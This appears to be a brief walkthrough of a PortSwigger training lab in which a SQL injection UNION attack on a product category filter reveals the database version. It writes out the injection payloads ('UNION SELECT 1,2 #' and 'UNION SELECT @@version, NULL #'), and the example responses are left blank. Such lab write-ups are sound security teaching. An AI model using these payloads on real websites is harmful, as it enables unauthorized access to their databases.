PortSwigger

Lab Description
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Objective: Display the database version string.
Step 1: Capture the Category Filter Request
- In Burp’s browser, access the lab
- Click on a product category filter (e.g., “Gifts”)
- In Burp Proxy, find the request
Example request:
GET /filter?category=Gifts HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Step 2: Determine Number of Columns
Test with UNION SELECT:
GET /filter?category=' UNION SELECT 1,2 # HTTP/1.1
Response:

Step 3: Retrieve Database Version
Payload (MySQL/Microsoft SQL Server):
GET /filter?category=' UNION SELECT @@version, NULL # HTTP/1.1
Response:

The version string is displayed in the response.
Step 4: Lab Solved
